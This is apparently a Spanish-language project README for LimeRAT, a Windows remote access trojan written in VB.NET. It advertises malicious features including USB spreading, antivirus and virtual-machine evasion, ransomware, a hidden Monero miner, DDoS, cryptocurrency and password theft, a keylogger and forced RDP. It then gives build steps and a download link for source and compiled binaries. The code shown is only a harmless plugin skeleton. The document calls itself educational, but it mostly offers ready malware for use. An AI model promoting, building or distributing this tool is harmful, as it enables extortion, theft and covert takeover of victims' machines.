LimeRAT: Herramienta de Administración Remota para Windows

RAT simple, pero potente para máquinas Windows. Este proyecto es simple y fácil de entender, debería brindarTe un conocimiento general sobre los malwares de dotNET y cómo se comporta.

Características principales

• .NET
  • Codificado en Visual Basic .NET, el cliente requiere la dependencia de framework 2.0 o 4.0, y el servidor es 4.0
• Conexión
  • Usando pastebin.com como ip:port , en lugar de noip.com DNS. Y también usando varios puertos
• Plugin
  • Uso del sistema de plugins para disminuir el tamaño del stub y reducir la detección de AV
• Cifrado
  • La comunicación entre el servidor y el cliente se cifra con AES
• Separarse
  • Infectar todos los archivos y carpetas en los controladores USB
• Bypass
  • Detección de AV baja y método de inicio no detectado
• Ligero
  • El tamaño de la carga útil es de aproximadamente 25 KB
• Anti Máquinas Virtuales
  • Desinstala si la máquina es virtual para evitar escanear o analizar
• Ransomware
  • Cifrado de archivos en todos los HHD y USB con extensión .Lime
• XMR Miner
  • Un minador de CPU Monero de alto rendimiento con optimizaciones de inactividad para el usuario.
• Ddos
  • Crear un potente ataque DDOS para que un servicio en línea no esté disponible
• Crypto Stealer
  • Robo de datos confidenciales de criptomonedas
• Screen-Locker
  • Impide que el usuario acceda a su GUI de Windows
• Y más
  • En Conectar automáticamente
  • Forzar la habilitación de Windows RDP
  • Persistencia
  • Gestor de archivos
  • Robo de Contraseñas
  • Escritorio remoto
  • Captador de Bitcoin
  • Downloader
  • Keylogger

Requisitos Previos

Para abrir el proyecto necesitas:

1. Visual Studio 2017
2. Este repositorio

Echa un Vistazo

Proyecto:

Ransomware:

Proceso Crítico:

Ejemplo de Plugin

VB.NET

'Easy to create a DLL plugin
Public Class Main
'Simple Msgbox
 Public Shared Sub CN(ByVal H As String, ByVal P As Integer, ByVal K As String, ByVal SP As String, ByVal PW As String, ByVal FP As String, ByVal HW As String, ByVal BT As String, ByVal PB As String)

  Msgbox("Hello Client!")

  Send("MSG" + SPL + "Hello Server!")
  'Client will send msg back to server, MSG will be showen in [LOG] Tab
	
 End Sub	
End Class

C#

public class Main
{
    // Simple Msgbox
    public static void CN(string H, int P, string K, string SP, string PW, string FP, string HW, string BT, string PB)
    {
        Msgbox("Hello Client!");

        Send("MSG" + SPL + "Hello Server!");
		// Client will send msg back to server, MSG will be showen in [LOG] Tab
    }
}

Pruebas

1. Abre “LimeRAT.sln”
2. Establece el compilador en el modo “Debug”
3. En el Explorador de soluciones, haz clic con el botón derecho en “Solution LimeRAT Project” y presiona “Rebuild Solution”
4. Pulsa el botón Run/Ejecutar. Ten en cuenta que tanto el cliente como el servidor son localhost.

Compilar

1. Abre “LimeRAT.sln”
2. Establece el compilador en el modo “Release”
3. En el Explorador de soluciones, haz clic con el botón derecho en “Solution LimeRAT Project” y presiona “Rebuild Solution”
4. Todo estará bajo el nombre de “\Project_EXE\Release”
5. Convertir stub.exe a stub.il, utilizando 

Descargar SRC y versión compilada

https://github.com/NYAN-x-CAT/Lime-RAT/releases

Este proyecto sólo fue probado en un laboratorio local. El servidor se probó en Windows 10, el cliente se probó en la máquina virtual de Windows 7.

1. Al usar el ransomware, el punto de restauración no se borrará a menos que la carga útil esté ejecutándose con privilegios de alto nivel.
2. El Anti-Kill (BSOD)  no funcionará a menos que la carga útil esté corriendo en un privilegio elevado.

¿Encontraste un error? Por favor, reportarlo.

Este proyecto está licenciado bajo la licencia MIT – ver el archivo LICENSE para más detalles.

https://github.com/NYAN-x-CAT/Lime-RAT